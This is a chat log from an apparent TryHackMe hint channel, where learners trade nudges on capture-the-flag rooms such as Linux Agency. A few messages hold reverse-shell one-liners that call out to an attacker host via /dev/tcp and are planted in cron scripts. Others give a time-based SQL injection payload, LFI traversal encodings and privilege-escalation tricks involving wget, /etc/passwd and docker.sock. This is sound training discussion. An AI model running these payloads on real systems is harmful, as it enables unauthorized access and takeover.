Ok, I'll try to use the attackbox instead
#room-hints
rocky fiber
rocky fiber
It was until I backgrounded it then it backgrounded the whole console instead of the session as I understand it
trim haven
Wow I am stupid.
rocky fiber
I can try
stuck fractal
But it should let you background smh
trim haven
Yeah, it was a meterpreter, then you spawned a shell and it won't let you out
rocky fiber
But it should let you background smh
omg yes, exit worked
Thank you!
C:\Windows\system32>exit
exit
meterpreter >
rocky fiber
there must be something wrong with my installation of Metasploit. Thanks both π
trim haven
I did nothing, I do not deserve any credit
rocky fiber
I did nothing, I do not deserve any credit
listening and talking it through always helps regardless π
trim haven
Haha, yes it does. I am going to go update all my notes although.
marsh saffron
@manic citrus Thanks again π got dalia's flag.
obtuse birch
is there anyway to connect to linux agency priv esc users without startting again from scratch
because I did like 4-5 escalations
and then took a break
and I'd hate to do it all again
trim haven
@obtuse birch Please do not post in multiple chats, that is spamming.
ripe hedge
is there anyway to connect to linux agency priv esc users without startting agai...
Nope
manic citrus
is there anyway to connect to linux agency priv esc users without startting agai...
On the missionXX you can ssh back in as the initial user and then do "su - missionXX" with the last flag you got as the password
manic citrus
Strike that, Penelope
Penlope is the first direct ssh but you can su - straight to back to viktor
obtuse birch
Take notes
notes as in, my methodology and the payloads?
ripe hedge
Yes
Get into the habit of copy-pasting and screenshotting everything
(is apparently essential for oscp)
obtuse birch
(is apparently essential for oscp)
is it, wow, didn't know that. Thanks
ripe hedge
Well if it's not documented, it didn't happen
obtuse birch
touche
ripe hedge
At least that's from what people who have done the oscp have said
obtuse birch
are you planning on giving it?
ripe hedge
Getting it assuming I can get work to let me take it
Might have to change jobs for that though :(
obtuse birch
that always a bi... big trouble
still fern
any hint on linux agency root.txt
ripe hedge
any hint on linux agency root.txt
Escape the great blue whale
still fern
yeah i am trying it can't figure it out
ripe hedge
Linpeas should spot it
And give a link to how to do it
Plus they made it easy to abuse
Look around for anything unusual
still fern
docker.sock??
ripe hedge
That certainly should not be in a container
There's one more piece to the puzzle, good hunting
ripe hedge
Naw that's a hint that you're in a container thougg
blazing thorn
back again to get LA done π
pure thistle
any hints on how to find the elastic volume in linuxagency?
blazing thorn
damn, got LA all done
penultimate flag was easier than I expected... needed a hint on it though
chilly wigeon
docker escape?
blazing thorn
||went too deep down the Docker route which wasn't needed until final flag||
ripe hedge
Elastic volume?
blazing thorn
I genuinely feel like Linux Agency is a room which deserves a badge reward
ripe hedge
I don't know...that room annoyed me a lot...
chilly wigeon
i agree
ripe hedge
Some bits were a bit repetitive in the first part
blazing thorn
sure
chilly wigeon
the second part is fun
pure thistle
@ripe hedge yes task3 flag 12
ripe hedge
The privesc vectors were fine, could have removed a couple of the gtfobins
Felt like there was a bit too much filler imo
blazing thorn
good for beginner imo
lavish crescent
Anyone Completed Linux Agency..
I'm stuck at mission 17 flag...
The hint is "SOS! Somebody kidnapped the elves of santa"
Pls give any hint
Thank you
green briar
I'm stuck at mission 11 flag...
The hint is "Your need to finD some way to reverse a binary tree."
Pls give any hint
green briar
i am just beginner
marsh saffron
Stuck at silvio's flag, i found a way to execute privesc using zip binary but its not working. Any help?
ripe hedge
I copy-pasted and it worked...
sonic wigeon
Stuck at silvio's flag, i found a way to execute privesc using zip binary but it...
Make sure your running it with that user
marsh saffron
Make sure your running it with that user
I'm sorry but how?
ripe hedge
Sudo -u usually
sonic wigeon
Yup
green briar
@ripe hedge how can i decode basically it is a directory
chilly wigeon
haha ,complete the Linux Agency, feel fun.....
sonic wigeon
Not working
Maybe your not doing the privesc correctly
pure thistle
I'm stuck at mission 11 flag...
The hint is "Your need to finD some way to rever...
hint fin ""D"" look in the man page of find
im stuck at flag25 dont understand the hint
ripe hedge
the binary checks a condition, find it
digital bolt
Hi any hints for penelope's flag in Linux Agency room ? ||Is it some base64 encoded file somewhere in /var ?||
green briar
I'm stuck at mission 11 flag...
The hint is "Your need to finD some way to rever...
still i am stuck
digital bolt
still i am stuck
Try ||grepping recursively ||
green briar
thnaks for help @digital bolt @ripe hedge @pure thistle
candid nimbus
Hi any hints for penelope's flag in Linux Agency room ? ||Is it some base64 enco...
Did you get Penelope's password?
ripe hedge
Hi any hints for penelope's flag in Linux Agency room ? ||Is it some base64 enco...
it's near sean's
digital bolt
Did you get Penelope's password?
Nopes
candid nimbus
OK, you need to go back to where you got Sean's and look.
opal vine
how can i escalate to root in "injection" pls?
winged mist
how can i escalate to root in "injection" pls?
What have you tried?
Iβm guessing you are on the last task right? βGet the flag!β
opal vine
sudo -l ,SUID and crontab
opal vine
Iβm guessing you are on the last task right? βGet the flag!β
yup true
winged mist
sudo -l ,SUID and crontab
Get a reverse shell & netcat running. Go from there
winged mist
Hint says βThere's no user to privesc to so where could the flag be...β
winged mist
Find
opal vine
@winged mist i found it, but isn't that considered cheating
like you are looking for a file called flag just cuz you know it's there
in a real world scenario we won't know if there's a file called flag
do you understand what i mean?
opal vine
what if the file was called anything else flag
we would never find it
what i mean is using find command to search for flags is not fair
what if we didn't know the name and we need it how are we supposed to find it?
winged mist
what if the file was called anything else flag
we would never find it
what i mea...
You should know what exactly you are looking for before starting
opal vine
bit it always called either flag.txt or user/root.txt so it would be easy using this method
i can do (grep -R "THM{") for half of the rooms and it'll work
winged mist
Not exactly kek. Irl is somewhat different from ctfs
fallow brook
anyone on linux agency ?
opal vine
where are you stuck?
winged mist
anyone on linux agency ?
Bet a bunch. But I havenβt finished it yet
So I might not be able to help sorry
Better just ask
& have patience
opal vine
@winged mist thx for the help
winged mist
what if the file was called anything else flag
we would never find it
what i mea...
You could ask this in #general & get more insight
winged mist
<@!726000662739025961> thx for the help
No p
rare dust
It doesn't take Y for does it respond to pings
Task 13 says what option you should use when the host doesn't reply ping.
sonic wigeon
anyone on linux agency ?
I have completed it
rare dust
It does reply a ping tho?
I don't get ping reply....
And if you think nmap says "Host is up" == "exists ping reply", it's wrong. Nmap's host discovery does not only ping(ICMP ECHO_REQUEST), but does more things.
slim pivot
Im doing linux agency trying to get dalia's flag. I dont know what im doing wrong:
- ||Crontab says Dalia executes /opt/scripts/47.sh||
- ||I edit the script to do reverse shell using
bash -c 'exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1'|| - ||The revshell does not execute and cronjob overrites the script again||
white salmon
I don't get ping reply....
And if you think nmap says "Host is up" == "exists p...
Ye I eventually figured it out, I was using wrong flag. I am a dummy
digital bolt
OK, you need to go back to where you got Sean's and look.
Thanks got it
white salmon
Im doing linux agency trying to get dalia's flag. I dont know what im doing wron...
|| bash -c ' bash -i &> /dev/tcp/$RHOST/$RPORT 0>&1'||
red arch
Bro I was stupid, it was so silly and easy answer, I found the flag instantly when I opened my laptop today.
Apparently there is nothing you can do when the brain freeze...
Anyway thanks for the help. π
slim pivot
|| bash -c ' bash -i &> /dev/tcp/$RHOST/$RPORT 0>&1'||
it worked, thanks! π
ripe hedge
Bro I was stupid, it was so silly and easy answer, I found the flag instantly wh...
Breaks are important ;)
white salmon
it worked, thanks! π
π
wary ocean
Having some trouble with Printer Hacking
How would I connect to a printer with a non-default port?
white salmon
Don't know if I'm doing anything wrong or what
I'm in the linux fundamentals 3 room on task 7 - I've found the binary - the test directory and file already seemed to be in my home directory but whenever I run the binary it just prints out test1234 which isn't the correct answer it would seem
pure thistle
ugggg having trouble with escaping a docker container
barren pier
Anyone give me a little hint on getting started with keldagrim... I'm completely stumped
astral smelt
No hints for 72 hours after release
stuck fractal
Anyone give me a little hint on getting started with keldagrim... I'm completely...
It hasn't been 72 hours yet, please wait 72 hours after release before asking for help/hints on rooms
ripe hedge
ugggg having trouble with escaping a docker container
Which room?
gaunt sonnet
wondering if someone can help me please on the Linux fundamentals 2 task 11 This challenge is pretty simple. The binary is checking to see if the environment variable "test1234" exists, and if it's set equal to the current $USER environment variable.
then it asks for shiba3 password
gaunt sonnet
Cancel found out thanks.
white salmon
Working on the room "John". Openwall's site is down, which has the answer to task 8 Q2. "What rule would we use to add all capital letters to the end of the word?" Can anyone help me with the syntax?
stuck fractal
Working on the room "John". Openwall's site is down, which has the answer to ta...
Openwall seems up
white salmon
shoot. must be my firewall blocking it then. Thanks!
pure thistle
Which room?
linux Agency
ripe hedge
linpeas might help
pure thistle
linpeas might help
hummm ok i don't understand how will linpeas help with the commands to break out of a docker container?
pure thistle
You'll know when you see it
yeah sorry that makes no sense to me
pure thistle
Finally after like 8hrs finished LinuxAgency root.txt was brutal
white salmon
can anyone help me with mission16 flag, i found the file but i cant figure out what type of encoding it is
linuxagency
i found out, but can anyone help me understand how to identify hashes by seeing them ? or is there a tool or something online( i try to use burp or crackstation)
ripe hedge
Hashid
white salmon
gotcha
white salmon
thank you for this one, i prefer using online crackers over stuff i need to install.
still fern
any hint on Madeye's Castle user1.txt
remote gate
!rule 13
proud scarabBOT
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.
remote gate
Gotta wait 72 hours π
white salmon
i cant understand the hint on mission24 "send the money to another country" ?
wary lark
Don't pay too much attention to the clues, just enumerate like you are doing a priv esc
white salmon
coolio
true orchid
Hello!
Do you have any idea how to transfer files faster from my computer to the attack machine? (I mean, the files that I downloaded from the website)
I'm using a http server for the moment, but it's a bit tricky and I'm searching for a better solution.
Thank you!
modest drift
white salmon
Doing the linux fundamentals 3 room - the binary is meant to look if there is a file in the home/test directory which there is but every time I run the binary it prints out test1234 and this isn't the flag π€
foggy haven
What should I put on the owner? https://cdn.voidchan.gg/u/vCD5sPr.png
trim haven
Doing the linux fundamentals 3 room - the binary is meant to look if there is a ...
You have nmot run the binary in that screenshot.
Not only that but I do not see the binary in that screenshot.
white salmon
Not only that but I do not see the binary in that screenshot.
Sorry was in a separate directory - marked as spoiler as finding it is part of the task
foggy haven
What should I put on the owner? https://cdn.voidchan.gg/u/vCD5sPr.png
nvm I misunderstood the question π
trim haven
You're entering the flag wrong @white salmon
white salmon
What should I put on the owner? https://cdn.voidchan.gg/u/vCD5sPr.png
Does the binary need to be in the same directory? π©
foggy haven
Does the binary need to be in the same directory? π©
I just misunderstood the question
It's fine now
white salmon
Does the binary need to be in the same directory? π©
Sorry meant to reply to @trim haven there
foggy haven
Oh
storm venture
can I get a sanity check for the bruteforcing part of Madeye's castle, or is it too early?
blazing thorn
too early, only just released I believe
only released yesterday
another ~48 hours to go
storm venture
Yeah, I think I have a few ideas, but all of them involve bruteforcing which I really don't want to resort to
storm venture
also, they spelt Hermione's name wrong and I don't know if it was a continued error, or just a typo - which kinda screws with my whole bruteforcing thing
balmy verge
yeah it's been throwing me for a loop as well
u got it ?
cuz i think i got something
flat dawn
anyone onto keldagrim?
chilly wigeon
@true orchid scp can transfer files between computers
storm venture
don't think we're allowed to give hints on keldagrim either as it's pretty recent
crisp burrow
Yeah, I think I have a few ideas, but all of them involve bruteforcing which I r...
got anything?
flat dawn
got anything?
have you found login page?
crisp burrow
yes
flat dawn
have you found notes?
crisp burrow
alright
storm venture
got anything?
not really in regards to that previous comment
crisp burrow
alright
candid nimbus
ANY HINTS ON LINUX AGENCY BRIBE TASK
Best hint I can give is not to get too distracted by the hint! There's something else you can look at to see what the folder owner has been up to.
vocal hinge
just rooted keldagrim, really nice machine, kudos to @dusky vigil
storm venture
ayy nice, good job
ripe hedge
u got it ?
naw not yet
balmy verge
naw not yet
can i dm
eager vale
Hello!
Do you have any idea how to transfer files faster from my computer to the...
Do scp
I get nulls ><
ruby needle
Just rooted Madeyes Castle. It was very pleasant journey to root π
@astral raptor yep
ruby needle
@astral raptor I can't no hints for 72 hours
astral raptor
π
ruby needle
Try Harder π
astral raptor
Yeah buddy
I tried some and got result
Maybe luc***** has to do something with something but i don't know what is that something π
trim haven
Please stop spoiling the box.
grim heron
may be we don't have write access here
past night
have you tried doing as the line that says: consider using PASV?
it can also be name or folder constraints, you may have write but not on that particular folder
ripe hedge
instead of you saying "send me data on this port" (active) it waits for the server to say "you can send data on this port" (passive)
if I understood correctly
it's who initiates the transfer
PASV mode is generally used to bypass firewalls
past night
^ yup that is correct, apologies for the delayed response, i was in a meeting 
white salmon
Who have done Madeye's Castle? I need help
stuck fractal
!rule 13
proud scarabBOT
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.
stuck fractal
@white salmon not yet
white salmon
Okay
native apex
hello is there any admin for Madeye's Castle
astral smelt
Why do you need an admin?
trim haven
Please do not ping the administrators.
native apex
ok sorry
ripe hedge
Also no hints for that box for at least 2 more days
bleak fulcrum
could I get a hint on linux agency -> mission12? I got no clue what the hint's talking about, and I didn't seem to find anything useful
nvm, got it
austere sparrow
hey guys can anyone help me with madeye's castle box?
proud scarabBOT
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.
austere sparrow
sorry didnt know the box is so recent
frank snow
has anyone encountered problems while ||decrypting the .pgp file|| on tomghost? I keep getting the ||gpg: decryption failed: secret key not available|| error
stuck fractal
Did you import the secret key?
frank snow
I have not, but I already cracked the other file. I'll research on that then thanks
ahhhh that's what I was supposed to do. got root, thanks again
white salmon
im on internal room,i have admin access on wordpress,but i cant install any plugins because of file writable rules 'An unexpected error occurred. Something may be wrong with WordPress.org or this serverβs configuration. If you continue to have problems, please try the support forums.' how can i upload my reverse shell? hint plz
runic oak
maybe you can change a existing template and run it? for an example the 404 file.
white salmon
yes,got it 1min ago,ty
opal vine
guys i'm doing the "chill hack" room and i'm in as the user apaar
i'm trying to escalate to root but idk how
i tried crontab, SUID and sudo -l nothing helps
how can i do that?
cold oracle
u got to steghide 1 picture
mossy ermine
Hi Guys, I would really appreciate an hint on Linux Agency. I am at the final steps, looking for user.txt. I actually have no clues. Tried to run Linpeas but I can't get anything useful from it. Many thanks
hollow lynx
Hi Guys, I would really appreciate an hint on Linux Agency. I am at the final st...
Check hint with ur programmer mindπ
zenith compass
Hi Guys, I would really appreciate an hint on Linux Agency. I am at the final st...
You should exploit ||sudo vulnerability||
mossy ermine
Thank you guys, I'll work on that
leaden walrus
Hi. I am stuck on the Nmap room (tryhackme.com/room/furthernmap) task 3 (Switches) question "How would you tell nmap to scan all port?". Can anyone give me a hint to the question? I looked through nmap -h but can't find anything useful, I used grep but still can't find anything useful.
leaden walrus
thank you. I appreciate it.
winter leaf
@leaden walrus use manual for nmap u have there much more information than on nmap -h
command: man nmap
unreal veldt
Concerning the OWASP-Juice-shop room in the beginner's learning path. I'm at task 4 where I'm using burp suite to brute force the admin's password and it has taken over 3 hours and hasn't finished yet. Is this normal? Or am I doing something wrong?
candid nimbus
Something's gone wrong. You'll have to give us a clue though.
stuck fractal
I mean also burp intruder is slow without burp pro
winter leaf
hydra is much faster
unreal veldt
Something's gone wrong. You'll have to give us a clue though.
Should intercept be on or off or that doesn't matter? I've been doing it with intercept off because I've had to keep extending the time
unreal veldt
I mean also burp intruder is slow without burp pro
True
stuck fractal
Try zap
winter leaf
but keldagrim was annouced on 29th of january
it was 4 days ago
72/24 = 3 days
@stuck fractal
stuck fractal
Ok
stuck fractal
No, you can't
wary lark
im little bit confused
winter leaf
-_-
winter sentinel
Hi everyone i am currently in the burp suit room at task 10. I have already found a response with a set-cookie header and send it to the sequencer when i run the sequencer i just accumulate requests but no tokens. What am i doing wrong. Ps: i also waited longer ~ 1 million requests
quick fern
any hints for Keldagrim?
trim haven
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
ripe hedge
is that message pinned, @trim haven it should be otherwise
ripe hedge
true
trim haven
So I copy and paste
ripe hedge
I'm sorry π¦
trim haven
Not your fault π€·ββοΈ
Rule 13 perfectly states that if they need help and do not specify it correctly, they can be denied help
ripe hedge
yeah but I'm still sorry you have to keep copy-pasting
trim haven
Please include the room, task, and question number in your question if possible.
trim haven
yeah but I'm still sorry you have to keep copy-pasting
Oh, it's no bother.
quick fern
Easy guys I am new kind in the block π Didn`t see pinned messages , will check now..
winter sentinel
Hi everyone i am currently in the burp suit room at task 10. I have already fou...
Should i post that in room-help ?
quick fern
I didn`t use thm discord a lot, always try more and more until a got root access..but with keldagrim i stuck with foothold, tried nmap, gobuster, nikto, web site source code searching...but no clue at all for me..did not try with msf yet..
ripe hedge
nmap should give a hint
let me check my notes
yeah nmap should be able to tell you what kind of server this is
gobuster should be able to find some juicy things as well
or in this case the page source
the rest is mostly looking around
quick fern
which wordlist did you use for gobuster? only found admin page
will follow that hints
ripe hedge
admin page sounds interesting, no?
quick fern
at the first check didn't see anything interesting will check once more :)
ripe hedge
there are two ways to get interesting things
but I'd google the type of server if you aren't familiar with it
opal vine
guys any hints on how can i escalate to root in "start up"?
astral smelt
linpeas
opal vine
it doesn't help
the escalate has something with file permission and where can i write to
storm venture
uh right, you wanna pm so you don't spoil anything?
astral smelt
Then check the file and see what it does
opal vine
uh right, you wanna pm so you don't spoil anything?
can i pm u?
storm venture
sure
brazen blaze
you know using grep with a tag can do pretty much every challenge in linuxagency
did some challenges with that, and 100% sure that was not the intended way
storm venture
regex :)
brazen blaze
read the walkthrough, he has used kinda same thing. But still 100% sure that is not the intended way
glacial gust
there are often unintentional methods in a room, the linuxagency is focused on sharpening your skills with the linux cli
brazen blaze
i want to learn that intended purpose
candid nimbus
1st look for locksmith blogs on getting into cars. It's something you'd put into the gap by the door & inflate so as not to damage anything. 2nd it's in the 1st video. If you didn't catch the term, it's on Deviant's web page. The last is a bit weird. It's not really the name of a thing, more the activity. Like something that blocks is blocking. In this case the word before-ing is something you might use to protect yourself if you wear armour or are Captain America.
ripe hedge
@candid nimbus in English, it's also a thing, but it's a strange grammatical quirk
you'd use it to protect cables from interference as well
candid nimbus
<@!651113392488054834> in English, it's also a thing, but it's a strange grammat...
I know. I've spoken it for 50 years and have an MA in it. I'm just helping the bod to the answer without getting excited about gerunds.
white salmon
hi there
ahm a smiple question if you dont mind
as i know answer suppos to be something like
--bypass firewall
--Stealth Scan
seems they are not correct , any body can help with that?
astral smelt
The first one is correct but needs to be worded differently
white salmon
oh....okay thanks now i have a clue about it
ripe hedge
it should be in the task, word for word
warped abyss
hello, i am doing the Bounty Hacker room. .com/room/cowboyhacker
if i use "locate user.txt" it works but it does not work with "locate root.txt"
also when i use "grep "THM" *.txt" it only shows me the user.txt
does someone know why cant find the root.txt?
stuck fractal
Are you root?
stuck fractal
Then you can't list /root usually
ripe hedge
you don't have execute/list rights on the directory
warped abyss
damn, nvm. thx guys π
molten iron
Could anyone pm for a nudge on 'Relevant'?
manic citrus
Could anyone pm for a nudge on 'Relevant'?
sure
opal vine
guys can i have a hint for wgel ctf
im really stuck
im in as jessie but i can't escalate to root although i can run wget as sudo
but i don't know how to take advantage of that
i thought of downloading the shadow file and cracking the hashes but the passwords are not in the rockyou list
rose cape
on linux agency, final task, need some assistence finding sean's flag. i know im in ||adm|| group but i have tried to grep recursivley in ||/var/log|| but couldnt find anything. any help? thanks
sonic wigeon
on linux agency, final task, need some assistence finding sean's flag. i know im...
Your in the right direction it is in || /var/log ||
rose cape
@sonic wigeon is it within one of the directories within ||/var/log|| i've parsed through what seems like every log file and cant seem to find anything that has to do with sean. some files are also huge which dosen't help
sonic wigeon
Are you looking for the flag recursively in the right format for sean ?
sonic wigeon
Np
white salmon
hey i need a kick in the right direction for a linux privesc, so i found a script which is executed by a non root user as a cronjob, which i have the write permission to. i cant think of anything other than putting something like this "bash -i >& /dev/tcp/10.0.0.1/8080 0>&1"
this is the first time im coming across a privesc like this!
tulip mural
hey i need a kick in the right direction for a linux privesc, so i found a scri...
You can simply put /bin/bash to get a shell
wintry yarrow
Any hints for last flag for Madeye's castle...
No hints or helps are allowed for new rooms till 72 hours passes.
void apex
Morning everyone. I did Ra2 and Set. Apparently, Osiris seems the hardest one. Any nudge on Ducky payload via TFTP. I tried to submit simple .bin payload to ping me back but to no avail. Definitely, I do something wrongly. Can anyone DM me with some nudges to put me on the right track, please?
cedar axle
guys can i have a hint for wgel ctf
im really stuck
im in as jessie but i can't ...
can you use wget to put a file where you shouldnt? ie. instead of reading a file writing a file
opal vine
can you use wget to put a file where you shouldnt? ie. instead of reading a file...
yes
i tried to download the /etc/sudoers and then edit it on my machine so i can run more commands as root but when i replace it with the original /etc/sudoers everything breaks and i can't see the output of sudo -l
cedar axle
with wget remember -o != -O
opal vine
i also tried to downlad /etc/passwd so i can edit it and put a user there with a uid 0
but when i type su (user) it also breaks
i used -O
opal vine
shadow?
cedar axle
.ssh
cunning quartz
New room I think?
lusty locust
New room I think?
yup
scenic creek
Hey guys,
I'm trying to do this room : https://tryhackme.com/room/brainstorm
I'm stuck on lauching the exe inside a windows 7 32 bit M (wiht immunity debugger installed), for those who have done this, what was your install ?
thanks for your help
scenic creek
This program cannot be run in DOS mode, I tried to search online but can't get what I'm doing wrong (tried with windows 10, windows 7)
zenith compass
||is that the hash value ?||
Yes
digital vector
okay thanx
kindred ore
Can anyone help me in madeyeβs castle
kindred ore
K
shut perch
Hi anyone working on NIC -Linux Part 1? I stuck for long this one. the shiba3 password and shiba4 password..... any guide of hint would be appricated
astral smelt
Check the linux rooms
past night
Hi anyone working on NIC -Linux Part 1? I stuck for long this one. the shiba3 pa...
I forgot that the linux rooms were updated so that content needs to be refreshed in regards to the room pointer
shut perch
Ok i got it done. i did not know it has nothing to do with the ROOM for that two questions
thanks for the room. Great one
past night
It's alright haha, it used to be 1 single box rather than 3 separate ones and thank you for your feedback β€οΈ
glacial gust
it should be in the users folder, you could also check for the file name
brazen blaze
How could we insert a new value called toyota to replace tesla?
i know how to do it, but not getting the answer right
could someone help
brazen blaze
may i dm you @tulip mural
tulip mural
may i dm you <@!709841693473636403>
Sure π
candid nimbus
i know how to do it, but not getting the answer right
You need to change the 'syntax' without changing the "semantics"π
distant tartan
i was doing linux agency when i reached mission 9 i got rockyou.txt in the directory of mission9 i tried locating flag.txt its there but when i tried opening it outputs permission denied
acoustic steppe
i was doing linux agency when i reached mission 9 i got rockyou.txt in the direc...
Just try to grep mission10
distant tartan
Just try to grep mission10
what can you eplain a lil bit more please
acoustic steppe
what can you eplain a lil bit more please
Use cat command by piping grep command
tranquil ivy
Anyone playing archangle ctf?
white salmon
my brain is dead and cant think what to do
trim haven
!rule 13
proud scarabBOT
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.
stuck fractal
@white salmon @tranquil ivy ^
trim haven
Thanks James.
trim haven
As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.
white salmon
alright thanks
proud scarabBOT
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.
viscid saddle
alright, sorry for asking but i have only now checked that it was released today
i usually open the machines in the new rooms section without looking up at the annoncments page, i'll keep that in mind for the future releases
thanks for let me know that
ripe hedge
eh?
hazy sequoia
got a question about the nmap room.
the last question says "deploy the ftp-anon script against the box"
unfortunately no matter how many times i run the script [nmap -vv --script ftp-anon -p 21 <ip address>]
i keep getting a response saying the Host seems down, if it is really up, but blocking our ping probes, try -Pn
am i doing something wrong?
can someone point me in the right direction?
is the task bugged?
Oh!
nvm
finally started working
looks like something was wrong with the room
rare valve
Guys any hints on Keldagrim room ?
trim haven
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
rare valve
Im basically stuck in the exploitation phase
hazy sequoia
so Im in the network services room, i've done everything right so far with the exception of.... I have no idea how to read a txt file in samba. Everything I try turns up nothing, either i get an object name not found or a failed to open message
stuck fractal
It has spaces in the file name
stuck fractal
Try quote marks or escaping the spaces
hazy sequoia
didnt work
stuck fractal
underscores are their own character
hazy sequoia
kk
stuck fractal
They're not spaces
hazy sequoia
hmmm, now i get a response that says for read/write fnum 4
stuck fractal
Just use get.
hazy sequoia
is there a manual i can read or shoulod have read before tackling this?
stuck fractal
it works just like the command line ftp client
hazy sequoia
omg, ty! i didnt think i'd actually have to download the file
chilly wigeon
Madeye Castle
prisma quarry
Need a little hint on linux agency, managed to get || robert's passphrase || but im unsure what to do now, doesn't seem to be an account
remote gate
Check for listening ports
ionic dirge
I have a problem in attacking kerberos room, in task 2, enumeration w/ kerbrute, I added CONTROLLER.local to my /etc/hosts file, then I execute the command ./kerbrute userenum --dc CONTROLLER.local -d CONTROLLER.local User.txt but it isnt finding nothing, Ideas?
nvm I forgot to get raw input from Users.txt when I wget the list
amber wagon
Enumerating Telnet in the Network Service room - can anyone share how you'd know that Telnet is the service being used? It doesn't indicate it in the scan from what I can tell
marsh violet
Enumerating Telnet in the Network Service room - can anyone share how you'd know...
from what I can remember its a backdoor you just use telnet to connect to this backdoor
or something like that not sure
sonic wigeon
Need a little hint on linux agency, managed to get || robert's passphrase || but...
Check what services are running on the machine
ripe hedge
Need a little hint on linux agency, managed to get || robert's passphrase || but...
Not all services are exposed to the outside world. Look at the type of credentials you got, surely they'll be useful somewhere
grim heron
hey , I am doing advent of cyber 1 Day 23 is related to sql injection and for that I used sqlmap , this is the payload of sqlmap , ||log_email=gyQB' AND (SELECT 2288 FROM (SELECT(SLEEP(5)))YfXe) AND 'qvoO'='qvoO|| but when I tried injecting it through the login page , I was still getting the error related to some email check , why ?
chilly wigeon
hello ,how bypass strpos($path,'../..')?
%2e%e%2f%2e%2e is not work
%252e%252e%252f%252e%252e is not work too
gusty kite
!rule 13
white salmon
@chilly wigeon I'm also struggling with that, we will have to wait until saturday evening for hints
chilly wigeon
haha .i will go ,bypass it~!~!~!~!
white salmon
I hate you @chilly wigeon π
candid nimbus
I'm sure you can progress fine on your own before then!
hollow lynx
archangel, more rickrolling than flags π . fun box
gusty kite
yeah a few hidden gems
white salmon
I already gave up, I tried literary dozens of things to bypass the lfi filter, I probably missing something obvious/simple/stupid , maybe tomorrow with a clean mindset...
gusty kite
bypass is actually very simple. For me the next step is much more annoying (it is so simple, yet I cant seem to find the right file)
candid nimbus
I already gave up, I tried literary dozens of things to bypass the lfi filter, I...
Amazing how many problems get solved away from the screen! π
compact mortar
Hello everyone, I am doing Archangel, I don't know how to view the code. You can help me. Thank you.
quiet stump
Hello everyone, I am doing Archangel, I don't know how to view the code. You can...
U need to wait 72hrs after release for hints. This will be on Saturday as the room was released yesterday.
compact mortar
okay
wicked bolt
I already gave up, I tried literary dozens of things to bypass the lfi filter, I...
same I view the code but that doesn't help me much haha
wicked bolt
but yeah no hints until saturday
Yeah understood already! I just like to discuss woes and not feel alone π - I'd already kinda discovered stuff through trial and error so for me it wasn't as helpful
ripe hedge
shhhh π
wicked bolt
ok i got it now, time away really does help π
still fern
any hint on madeye's castle user1.txt
ripe hedge
is Madeye's open?
still fern
wdym
ripe hedge
are we allows to give hints
still fern
yeah i guess
ripe hedge
in any case, tell us where you're at, and what you've tried
still fern
got the spellnames.txt try to login in the .thm site
distant tartan
hello i am on linux agency mission12 i got in the mission11 dir got some dir named share > nano found nothing in those i want the flag of misson 12 hint says its tome to study EVS i dont what that is
hexed crescent
hello i am on linux agency mission12 i got in the mission11 dir got some dir nam...
EVs (Environment Variables)
ripe hedge
yeah the hint is a bit misleading
hexed crescent
Let me change the hint.
ripe hedge
got the spellnames.txt try to login in the .thm site
there's no brute force involved on the login page
still fern
ok
ripe hedge
(you'll need to hang on to that list though)
hexed crescent
The hint now says EVs.
ripe hedge
not my place to say, but maybe check with the room creators?
distant tartan
The hint now says EVs.
thanks sir
distant tartan
The hint now says EVs.
i would be glad if you can tell me where to study those i didn't found any great site by goggling
ripe hedge
2:58 PM] timtaylor: EVs (Environment Variables)
distant tartan
> 2:58 PM] timtaylor: EVs (Environment Variables)
got the flag thanks fot your help
distant tartan
gj
i was styding but just for curiosity whats the diffrence between EVs and normal variables
ripe hedge
what do you mean by normal variables
distant tartan
what do you mean by normal variables
they are sertup to store arbitary information
for convienience
ripe hedge
I mean in what sense
distant tartan
I mean in what sense
variable in linux
wicked bolt
environment variables are just variables in the environment you're in as the name π
ripe hedge
like with bash, if you do VAR = value then you're basically setting up an environment variable
distant tartan
like with bash, if you do `VAR = value` then you're basically setting up an envi...
